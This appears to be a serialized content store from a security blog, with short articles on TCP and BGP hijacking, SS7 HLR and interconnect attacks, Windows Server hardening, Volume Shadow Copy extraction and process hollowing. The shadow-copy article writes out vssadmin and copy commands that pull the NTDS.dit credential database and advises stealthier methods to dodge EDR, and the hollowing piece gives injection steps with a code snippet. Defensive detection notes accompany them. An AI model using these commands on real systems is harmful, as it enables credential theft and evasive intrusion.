MIN",{"title":824,"description":981},"networking\u002Fbgp-hijacking-simulation","0JqhSeDwLCJ0YQOQoMK-38kTohLiR0nfzNj_ufr-B94",{"id":991,"title":992,"author":664,"body":993,"category":979,"date":177,"description":1061,"difficulty":486,"extension":180,"icon":983,"meta":1062,"navigation":183,"path":1063,"readTime":188,"seo":1064,"stem":1065,"tags":1066,"__hash__":1071},"content\u002Fnetworking\u002Ftcp-ip-hijacking.md","TCP\u002FIP Hijacking: Advanced Techniques",{"type":9,"value":994,"toc":1055},[995,999,1002,1006,1009,1013,1016,1020,1034,1052],[12,996,998],{"id":997},"tcpip-hijacking-and-session-persistence","TCP\u002FIP Hijacking and Session Persistence",[17,1000,1001],{},"TCP hijacking is a significant threat in unsecured networks. This writeup covers the methodology of session hijacking and how to mitigate it at the network layer.",[21,1003,1005],{"id":1004},"_1-sequence-number-prediction","1. Sequence Number Prediction",[17,1007,1008],{},"Modern TCP stacks use strong random sequence numbers (ISN). However, older systems or specific implementations are still vulnerable to prediction attacks.",[21,1010,1012],{"id":1011},"_2-bgp-hijacking","2. BGP Hijacking",[17,1014,1015],{},"BGP (Border Gateway Protocol) is the backbone of the internet. By announcing false routes, attackers can redirect traffic to malicious nodes.",[65,1017,1019],{"id":1018},"mitigation-strategies","Mitigation Strategies:",[29,1021,1022,1028],{},[32,1023,1024,1027],{},[35,1025,1026],{},"RPKI",": Resource Public Key Infrastructure for verifying BGP announcements.",[32,1029,1030,1033],{},[35,1031,1032],{},"TLS\u002FIPsec",": Encrypting end-to-end traffic to prevent plaintext interception.",[73,1035,1037],{"className":285,"code":1036,"language":287,"meta":78,"style":78},"# Verify route propagation\ntraceroute 8.8.8.8\n",[46,1038,1039,1044],{"__ignoreMap":78},[82,1040,1041],{"class":84,"line":85},[82,1042,1043],{"class":550},"# Verify route propagation\n",[82,1045,1046,1049],{"class":84,"line":163},[82,1047,1048],{"class":294},"traceroute",[82,1050,1051],{"class":320}," 8.8.8.8\n",[159,1053,1054],{},"html pre.shiki code .sHwdD, html code.shiki .sHwdD{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#546E7A;--shiki-default-font-style:italic;--shiki-dark:#676E95;--shiki-dark-font-style:italic}html pre.shiki code .sBMFI, html code.shiki .sBMFI{--shiki-light:#E2931D;--shiki-default:#FFCB6B;--shiki-dark:#FFCB6B}html pre.shiki code .sbssI, html code.shiki .sbssI{--shiki-light:#F76D47;--shiki-default:#F78C6C;--shiki-dark:#F78C6C}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":78,"searchDepth":163,"depth":163,"links":1056},[1057,1058],{"id":1004,"depth":163,"text":1005},{"id":1011,"depth":163,"text":1012,"children":1059},[1060],{"id":1018,"depth":169,"text":1019},"A deep dive into session hijacking, packet injection, and BGP routing security.",{},"\u002Fnetworking\u002Ftcp-ip-hijacking",{"title":992,"description":1061},"networking\u002Ftcp-ip-hijacking",[1067,1068,1069,1070],"tcp","hijacking","bgp","security","36y1dL_Dy6-2K6M5sRDQKm5oijDM9Su_WB3xQ_BKsB8",{"id":1073,"title":1074,"author":7,"body":1075,"category":1239,"date":1240,"description":1241,"difficulty":486,"extension":180,"icon":1242,"meta":1243,"navigation":183,"path":1244,"readTime":1245,"seo":1246,"stem":1247,"tags":188,"__hash__":1248},"content\u002Fss7-signaling\u002Fhlr-lookup-vectors.md","HLR Lookup Attack Vectors",{"type":9,"value":1076,"toc":1229},[1077,1081,1084,1088,1095,1099,1102,1122,1126,1130,1133,1137,1140,1195,1203,1207,1227],[12,1078,1080],{"id":1079},"hlr-lookup-attack-vectors-in-ss7","HLR Lookup Attack Vectors in SS7",[17,1082,1083],{},"The Home Location Register (HLR) is a central database that contains details of each mobile phone subscriber that is authorized to use the GSM core network.",[21,1085,1087],{"id":1086},"the-role-of-sri-send-routing-info","The Role of SRI (Send Routing Info)",[17,1089,1090,1091,1094],{},"Attackers often use the ",[46,1092,1093],{},"SendRoutingInfoForSM"," MAP (Mobile Application Part) message to query the HLR. This message is intended to facilitate SMS delivery but can be abused.",[65,1096,1098],{"id":1097},"metadata-extraction","Metadata Extraction",[17,1100,1101],{},"A successful SRI query can return:",[29,1103,1104,1110,1116],{},[32,1105,1106,1109],{},[35,1107,1108],{},"IMSI",": The unique ID of the subscriber.",[32,1111,1112,1115],{},[35,1113,1114],{},"MSC Address",": The current Mobile Switching Center the subscriber is connected to.",[32,1117,1118,1121],{},[35,1119,1120],{},"VLR Address",": The Visitor Location Register details.",[21,1123,1125],{"id":1124},"exploitation-scenarios","Exploitation Scenarios",[65,1127,1129],{"id":1128},"_1-precise-location-tracking","1. Precise Location Tracking",[17,1131,1132],{},"By knowing the MSC\u002FVLR address, an attacker can pinpoint a subscriber's location down to a specific city or even a neighborhood.",[65,1134,1136],{"id":1135},"_2-denial-of-service-dos","2. Denial of Service (DoS)",[17,1138,1139],{},"Flooding the HLR with malicious queries can degrade service for legitimate subscribers or even cause a complete network outage in a specific region.",[73,1141,1145],{"className":1142,"code":1143,"language":1144,"meta":78,"style":78},"language-mermaid shiki shiki-themes material-theme-lighter material-theme material-theme-palenight","sequenceDiagram\n    participant Attacker\n    participant STP as Signaling Transfer Point\n    participant HLR as Home Location Register\n    \n    Attacker->>STP: SRI_SM (MSISDN)\n    STP->>HLR: Forward SRI_SM\n    HLR-->>STP: ACK (IMSI, MSC_Address)\n    STP-->>Attacker: Subscriber MetaData\n","mermaid",[46,1146,1147,1152,1157,1162,1167,1172,1177,1183,1189],{"__ignoreMap":78},[82,1148,1149],{"class":84,"line":85},[82,1150,1151],{},"sequenceDiagram\n",[82,1153,1154],{"class":84,"line":163},[82,1155,1156],{},"    participant Attacker\n",[82,1158,1159],{"class":84,"line":169},[82,1160,1161],{},"    participant STP as Signaling Transfer Point\n",[82,1163,1164],{"class":84,"line":898},[82,1165,1166],{},"    participant HLR as Home Location Register\n",[82,1168,1169],{"class":84,"line":910},[82,1170,1171],{},"    \n",[82,1173,1174],{"class":84,"line":922},[82,1175,1176],{},"    Attacker->>STP: SRI_SM (MSISDN)\n",[82,1178,1180],{"class":84,"line":1179},7,[82,1181,1182],{},"    STP->>HLR: Forward SRI_SM\n",[82,1184,1186],{"class":84,"line":1185},8,[82,1187,1188],{},"    HLR-->>STP: ACK (IMSI, MSC_Address)\n",[82,1190,1192],{"class":84,"line":1191},9,[82,1193,1194],{},"    STP-->>Attacker: Subscriber MetaData\n",[601,1196,1197],{},[17,1198,1199,1202],{},[82,1200,1201],{},"!CAUTION","\nSS7 vulnerabilities are protocol-level flaws. Even modern 4G\u002F5G networks often fall back to SS7 for international roaming, maintaining this attack surface.",[21,1204,1206],{"id":1205},"defensive-strategies","Defensive Strategies",[29,1208,1209,1215,1221],{},[32,1210,1211,1214],{},[35,1212,1213],{},"Signaling Firewalls",": Implement firewalls that can inspect MAP messages and block suspicious SRI patterns.",[32,1216,1217,1220],{},[35,1218,1219],{},"IMSI Randomization",": Use temporary identifiers (TMSI) to mask the permanent IMSI.",[32,1222,1223,1226],{},[35,1224,1225],{},"Home Routing",": Ensure that signaling messages are always routed through the home network for validation.",[159,1228,161],{},{"title":78,"searchDepth":163,"depth":163,"links":1230},[1231,1234,1238],{"id":1086,"depth":163,"text":1087,"children":1232},[1233],{"id":1097,"depth":169,"text":1098},{"id":1124,"depth":163,"text":1125,"children":1235},[1236,1237],{"id":1128,"depth":169,"text":1129},{"id":1135,"depth":169,"text":1136},{"id":1205,"depth":163,"text":1206},"ss7-signaling","2026-05-05","Analyzing the exploitation of Home Location Register queries for subscriber tracking and metadata extraction.","i-heroicons-signal",{},"\u002Fss7-signaling\u002Fhlr-lookup-vectors","15 MIN",{"title":1074,"description":1241},"ss7-signaling\u002Fhlr-lookup-vectors","YYy-RtV8J0LWjRpUJSBpr1u_5eIDRjXMwXzrbCZ54xU",{"id":1250,"title":1251,"author":664,"body":1252,"category":1239,"date":1305,"description":1306,"difficulty":982,"extension":180,"icon":1307,"meta":1308,"navigation":183,"path":1309,"readTime":188,"seo":1310,"stem":1311,"tags":1312,"__hash__":1317},"content\u002Fss7-signaling\u002Finterconnect-security.md","SS7 Interconnect Security: The Silent Threat",{"type":9,"value":1253,"toc":1299},[1254,1258,1261,1265,1272,1276,1282,1286],[12,1255,1257],{"id":1256},"ss7-interconnect-security","SS7 Interconnect Security",[17,1259,1260],{},"Signaling System No. 7 (SS7) remains the primary protocol for international roaming and SMS delivery, despite its inherent lack of authentication.",[21,1262,1264],{"id":1263},"_1-location-tracking","1. Location Tracking",[17,1266,1267,1268,1271],{},"By sending a ",[46,1269,1270],{},"ProvideSubscriberInfo"," (PSI) request with a spoofed source identity, an attacker can query the current cell ID of any subscriber globally.",[21,1273,1275],{"id":1274},"_2-sms-interception","2. SMS Interception",[17,1277,595,1278,1281],{},[46,1279,1280],{},"InsertSubscriberData"," (ISD) message can be misused to redirect SMS traffic to an attacker-controlled HLR (Home Location Register).",[65,1283,1285],{"id":1284},"protection-mechanisms","Protection Mechanisms:",[29,1287,1288,1293],{},[32,1289,1290,1292],{},[35,1291,1213],{},": Inspecting incoming MAP\u002FCAMEL messages for anomalies.",[32,1294,1295,1298],{},[35,1296,1297],{},"Diameter Security",": Hardening LTE\u002F5G signaling interfaces (S6a, N2).",{"title":78,"searchDepth":163,"depth":163,"links":1300},[1301,1302],{"id":1263,"depth":163,"text":1264},{"id":1274,"depth":163,"text":1275,"children":1303},[1304],{"id":1284,"depth":169,"text":1285},"2026-05-11","Analyzing vulnerabilities in Global Title Translation (GTT) and SMS interception.","i-heroicons-device-phone-mobile",{},"\u002Fss7-signaling\u002Finterconnect-security",{"title":1251,"description":1306},"ss7-signaling\u002Finterconnect-security",[1313,1314,1315,1316],"ss7","telecom","signaling","gtt","-UMX5PyjxUyiWWP8nZvRTJzW_qRdnQnm3JzHgN8cQUg",{"id":1319,"title":1320,"author":664,"body":1321,"category":1419,"date":1420,"description":1421,"difficulty":653,"extension":180,"icon":1422,"meta":1423,"navigation":183,"path":1424,"readTime":188,"seo":1425,"stem":1426,"tags":1427,"__hash__":1432},"content\u002Fwindows-server\u002Fhardening-guide.md","Windows Server Hardening Guide",{"type":9,"value":1322,"toc":1413},[1323,1326,1329,1333,1353,1357,1377,1381,1395,1399],[12,1324,1320],{"id":1325},"windows-server-hardening-guide",[17,1327,1328],{},"Securing a Windows Server instance requires a defense-in-depth approach, starting from the OS and extending to the network and role-specific configurations.",[21,1330,1332],{"id":1331},"_1-attack-surface-reduction-asr","1. Attack Surface Reduction (ASR)",[29,1334,1335,1341,1347],{},[32,1336,1337,1340],{},[35,1338,1339],{},"Minimal Roles",": Only install the necessary server roles and features. Use \"Server Core\" whenever possible.",[32,1342,1343,1346],{},[35,1344,1345],{},"Disable Legacy Protocols",": Disable SMBv1, LLMNR, NetBIOS, and NTLMv1.",[32,1348,1349,1352],{},[35,1350,1351],{},"Remove Unused Services",": Audit services and disable any not required for the server's function.",[21,1354,1356],{"id":1355},"_2-access-control","2. Access Control",[29,1358,1359,1365,1371],{},[32,1360,1361,1364],{},[35,1362,1363],{},"PAWs",": Use Privileged Access Workstations for server management.",[32,1366,1367,1370],{},[35,1368,1369],{},"JEA\u002FJIT",": Implement Just-Enough-Administration and Just-In-Time access.",[32,1372,1373,1376],{},[35,1374,1375],{},"Least Privilege",": Avoid using Domain Admin accounts for routine server maintenance.",[21,1378,1380],{"id":1379},"_3-patching-updates","3. Patching & Updates",[29,1382,1383,1389],{},[32,1384,1385,1388],{},[35,1386,1387],{},"Automated Patching",": Use WSUS or Azure Update Manager to ensure critical security patches are applied within 48 hours.",[32,1390,1391,1394],{},[35,1392,1393],{},"Driver Management",": Audit and restrict third-party drivers to prevent kernel-level exploits.",[21,1396,1398],{"id":1397},"_4-monitoring-logging","4. Monitoring & Logging",[29,1400,1401,1407],{},[32,1402,1403,1406],{},[35,1404,1405],{},"Sysmon",": Deploy Microsoft Sysmon for deep visibility into process creations, network connections, and file changes.",[32,1408,1409,1412],{},[35,1410,1411],{},"Centralized Logs",": Forward Event Logs to a SIEM (e.g., Splunk, Microsoft Sentinel).",{"title":78,"searchDepth":163,"depth":163,"links":1414},[1415,1416,1417,1418],{"id":1331,"depth":163,"text":1332},{"id":1355,"depth":163,"text":1356},{"id":1379,"depth":163,"text":1380},{"id":1397,"depth":163,"text":1398},"windows-server","2024-05-22","Essential hardening steps for securing Windows Server roles and services.","i-heroicons-server",{},"\u002Fwindows-server\u002Fhardening-guide",{"title":1320,"description":1421},"windows-server\u002Fhardening-guide",[1428,1429,1430,1431],"Hardening","Windows Server","Best Practices","Security","y7fx1EW89R2g5GE_U5tKcg4lcGsgaizpwLUh7cpnsD0",{"id":1434,"title":1435,"author":7,"body":1436,"category":1419,"date":1616,"description":1617,"difficulty":179,"extension":180,"icon":1618,"meta":1619,"navigation":183,"path":1620,"readTime":1621,"seo":1622,"stem":1623,"tags":188,"__hash__":1624},"content\u002Fwindows-server\u002Fshadow-copy-extraction.md","Volume Shadow Copy Extraction",{"type":9,"value":1437,"toc":1607},[1438,1442,1445,1449,1452,1472,1476,1480,1487,1517,1521,1524,1539,1554,1558,1561,1588,1591,1605],[12,1439,1441],{"id":1440},"volume-shadow-copy-vss-extraction","Volume Shadow Copy (VSS) Extraction",[17,1443,1444],{},"Volume Shadow Copy Service (VSS) is a technology included in Microsoft Windows that allows taking manual or automatic backup copies or snapshots of computer files or volumes, even when they are in use.",[21,1446,1448],{"id":1447},"the-attackers-perspective","The Attacker's Perspective",[17,1450,1451],{},"VSS is a goldmine for attackers because it allows them to copy files that are normally locked by the operating system, such as:",[29,1453,1454,1463,1469],{},[32,1455,1456,750,1459,1462],{},[46,1457,1458],{},"SAM",[46,1460,1461],{},"SYSTEM"," hives.",[32,1464,1465,1468],{},[46,1466,1467],{},"NTDS.dit"," (Active Directory Database).",[32,1470,1471],{},"Locked log files.",[21,1473,1475],{"id":1474},"extraction-methodology","Extraction Methodology",[65,1477,1479],{"id":1478},"using-vssadmin","Using vssadmin",[17,1481,1482,1483,1486],{},"The built-in ",[46,1484,1485],{},"vssadmin"," tool is the most common way to interact with shadow copies.",[73,1488,1490],{"className":75,"code":1489,"language":77,"meta":78,"style":78},"# Create a new shadow copy of the C drive\nvssadmin create shadow \u002Ffor=C:\n\n# List existing shadow copies\nvssadmin list shadows\n",[46,1491,1492,1497,1502,1507,1512],{"__ignoreMap":78},[82,1493,1494],{"class":84,"line":85},[82,1495,1496],{},"# Create a new shadow copy of the C drive\n",[82,1498,1499],{"class":84,"line":163},[82,1500,1501],{},"vssadmin create shadow \u002Ffor=C:\n",[82,1503,1504],{"class":84,"line":169},[82,1505,1506],{"emptyLinePlaceholder":183},"\n",[82,1508,1509],{"class":84,"line":898},[82,1510,1511],{},"# List existing shadow copies\n",[82,1513,1514],{"class":84,"line":910},[82,1515,1516],{},"vssadmin list shadows\n",[65,1518,1520],{"id":1519},"accessing-the-snapshot","Accessing the Snapshot",[17,1522,1523],{},"Once a shadow copy is created, it can be accessed via its global root path.",[73,1525,1527],{"className":75,"code":1526,"language":77,"meta":78,"style":78},"# Copy the NTDS.dit from the shadow copy\ncopy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit C:\\temp\\ntds.dit\n",[46,1528,1529,1534],{"__ignoreMap":78},[82,1530,1531],{"class":84,"line":85},[82,1532,1533],{},"# Copy the NTDS.dit from the shadow copy\n",[82,1535,1536],{"class":84,"line":163},[82,1537,1538],{},"copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit C:\\temp\\ntds.dit\n",[601,1540,1541],{},[17,1542,1543,1546,1547,1549,1550,1553],{},[82,1544,1545],{},"!TIP","\nUsing ",[46,1548,1485],{}," often triggers EDR alerts. Consider using more stealthy methods like ",[46,1551,1552],{},"ntdsutil"," or raw disk access if possible.",[21,1555,1557],{"id":1556},"detecting-vss-abuse","Detecting VSS Abuse",[17,1559,1560],{},"Defenders should monitor for:",[144,1562,1563,1576,1582],{},[32,1564,1565,1568,1569,49,1572,1575],{},[35,1566,1567],{},"vssadmin Execution",": Especially with ",[46,1570,1571],{},"create shadow",[46,1573,1574],{},"delete shadows"," arguments.",[32,1577,1578,1581],{},[35,1579,1580],{},"Unauthorized access to GLOBALROOT",": Accessing volume shadow copy device paths.",[32,1583,1584,1587],{},[35,1585,1586],{},"Volume Creation Events",": Event ID 7036 or similar VSS service start\u002Fstop events.",[21,1589,1430],{"id":1590},"best-practices",[29,1592,1593,1599],{},[32,1594,1595,1598],{},[35,1596,1597],{},"Restrict Local Admin",": VSS operations require high privileges. Limiting who has local admin rights is the first line of defense.",[32,1600,1601,1604],{},[35,1602,1603],{},"Audit Backup Operations",": Ensure only authorized backup software is interacting with VSS.",[159,1606,161],{},{"title":78,"searchDepth":163,"depth":163,"links":1608},[1609,1610,1614,1615],{"id":1447,"depth":163,"text":1448},{"id":1474,"depth":163,"text":1475,"children":1611},[1612,1613],{"id":1478,"depth":169,"text":1479},{"id":1519,"depth":169,"text":1520},{"id":1556,"depth":163,"text":1557},{"id":1590,"depth":163,"text":1430},"2026-05-02","Leveraging VSS to extract sensitive system files and database snapshots from live Windows Server instances.","i-heroicons-server-stack",{},"\u002Fwindows-server\u002Fshadow-copy-extraction","10 MIN",{"title":1435,"description":1617},"windows-server\u002Fshadow-copy-extraction","W8Y7E1nb6LP73ayC7w8u27mZk--gL1UsxeM8FOtvw-4",{"id":1626,"title":1627,"author":664,"body":1628,"category":1802,"date":1803,"description":1804,"difficulty":486,"extension":180,"icon":1805,"meta":1806,"navigation":183,"path":1807,"readTime":188,"seo":1808,"stem":1809,"tags":1810,"__hash__":1815},"content\u002Fwindows\u002Fprocess-hollowing.md","Windows Process Hollowing",{"type":9,"value":1629,"toc":1793},[1630,1634,1637,1641,1712,1716,1721,1725,1747,1751,1754,1758,1761,1765,1768,1791],[12,1631,1633],{"id":1632},"windows-process-hollowing-t1055012","Windows Process Hollowing (T1055.012)",[17,1635,1636],{},"Process Hollowing is a code injection technique where the executable logic of a legitimate process is replaced with arbitrary malicious code.",[21,1638,1640],{"id":1639},"technical-breakdown","Technical Breakdown",[144,1642,1643,1664,1675,1684,1693,1703],{},[32,1644,1645,1648,1649,49,1652,1655,1656,1659,1660,1663],{},[35,1646,1647],{},"Process Creation",": Start a legitimate process (like ",[46,1650,1651],{},"svchost.exe",[46,1653,1654],{},"explorer.exe",") in a suspended state using ",[46,1657,1658],{},"CreateProcessA"," with the ",[46,1661,1662],{},"CREATE_SUSPENDED"," flag.",[32,1665,1666,1667,1670,1671,1674],{},"**Unmapping Memory",[46,1668,1669],{},": Use ","ZwUnmapViewOfSection",[46,1672,1673],{},"or","NtUnmapViewOfSection` to hollow out the original executable code from the process's memory space.",[32,1676,1677,1680,1681,232],{},[35,1678,1679],{},"Memory Allocation",": Allocate new memory in the target process using ",[46,1682,1683],{},"VirtualAllocEx",[32,1685,1686,1689,1690,232],{},[35,1687,1688],{},"Code Injection",": Write the malicious payload into the newly allocated space with ",[46,1691,1692],{},"WriteProcessMemory",[32,1694,1695,1698,1699,1702],{},[35,1696,1697],{},"Entry Point Hijacking",": Adjust the thread context (",[46,1700,1701],{},"SetThreadContext",") to point to the new entry point.",[32,1704,1705,1708,1709,232],{},[35,1706,1707],{},"Resuming Execution",": Resume the process using ",[46,1710,1711],{},"ResumeThread",[21,1713,1715],{"id":1714},"lab-scenario-hollowing-svchostexe","Lab Scenario: Hollowing svchost.exe",[17,1717,1718,1719,232],{},"In this lab, we will use a custom C++ loader to hollow out a suspended instance of ",[46,1720,1651],{},[65,1722,1724],{"id":1723},"step-1-create-suspended-process","Step 1: Create Suspended Process",[73,1726,1730],{"className":1727,"code":1728,"language":1729,"meta":78,"style":78},"language-cpp shiki shiki-themes material-theme-lighter material-theme material-theme-palenight","STARTUPINFOA si;\nPROCESS_INFORMATION pi;\nCreateProcessA(NULL, (LPSTR)\"svchost.exe\", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);\n","cpp",[46,1731,1732,1737,1742],{"__ignoreMap":78},[82,1733,1734],{"class":84,"line":85},[82,1735,1736],{},"STARTUPINFOA si;\n",[82,1738,1739],{"class":84,"line":163},[82,1740,1741],{},"PROCESS_INFORMATION pi;\n",[82,1743,1744],{"class":84,"line":169},[82,1745,1746],{},"CreateProcessA(NULL, (LPSTR)\"svchost.exe\", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);\n",[65,1748,1750],{"id":1749},"step-2-unmap-original-executable","Step 2: Unmap Original Executable",[17,1752,1753],{},"We need to query the base address of the image from the PEB (Process Environment Block).",[65,1755,1757],{"id":1756},"step-3-inject-payload","Step 3: Inject Payload",[17,1759,1760],{},"Ensure the base address and relocations are handled correctly if the payload isn't position-independent.",[21,1762,1764],{"id":1763},"defensive-perspective","Defensive Perspective",[17,1766,1767],{},"Evasion-focused EDRs look for:",[29,1769,1770,1775,1788],{},[32,1771,1772,1773,232],{},"Processes created with ",[46,1774,1662],{},[32,1776,1777,1778,1781,1782,1784,1785,232],{},"Use of ",[46,1779,1780],{},"NtUnmapViewOfSection"," followed by ",[46,1783,1683],{}," with ",[46,1786,1787],{},"PAGE_EXECUTE_READWRITE",[32,1789,1790],{},"Inconsistencies between the PEB and the actual resident image.",[159,1792,161],{},{"title":78,"searchDepth":163,"depth":163,"links":1794},[1795,1796,1801],{"id":1639,"depth":163,"text":1640},{"id":1714,"depth":163,"text":1715,"children":1797},[1798,1799,1800],{"id":1723,"depth":169,"text":1724},{"id":1749,"depth":169,"text":1750},{"id":1756,"depth":169,"text":1757},{"id":1763,"depth":163,"text":1764},"windows","2024-05-20","Mastering evasion techniques by injecting code into legitimate processes via Process Hollowing.","i-heroicons-window",{},"\u002Fwindows\u002Fprocess-hollowing",{"title":1627,"description":1804},"windows\u002Fprocess-hollowing",[1811,1812,1813,1814],"Windows","Malware","Evasion","Injection","-FYzwfq5w2UOnE88342YxfFhyq5gYS-GFpWUwcYQJuY",{"id":729,"title":730,"author":664,"body":1817,"category":715,"date":812,"description":813,"difficulty":486,"extension":180,"icon":654,"meta":1872,"navigation":183,"path":815,"readTime":188,"seo":1873,"stem":817,"tags":1874,"__hash__":821},{"type":9,"value":1818,"toc":1867},[1819,1821,1823,1825,1831,1833,1835,1837,1847,1865],[12,1820,736],{"id":735},[17,1822,739],{},[21,1824,743],{"id":742},[17,1826,746,1827,750,1829,754],{},[46,1828,749],{},[46,1830,753],{},[21,1832,758],{"id":757},[17,1834,761],{},[21,1836,765],{"id":764},[29,1838,1839,1843],{},[32,1840,1841,773],{},[35,1842,772],{},[32,1844,1845,779],{},[35,1846,778],{},[73,1848,1849],{"className":285,"code":782,"language":287,"meta":78,"style":78},[46,1850,1851,1855],{"__ignoreMap":78},[82,1852,1853],{"class":84,"line":85},[82,1854,789],{"class":550},[82,1856,1857,1859,1861,1863],{"class":84,"line":163},[82,1858,794],{"class":294},[82,1860,797],{"class":298},[82,1862,800],{"class":298},[82,1864,803],{"class":320},[159,1866,806],{},{"title":78,"searchDepth":163,"depth":163,"links":1868},[1869,1870,1871],{"id":742,"depth":163,"text":743},{"id":757,"depth":163,"text":758},{"id":764,"depth":163,"text":765},{},{"title":730,"description":813},[715,724,819,820]]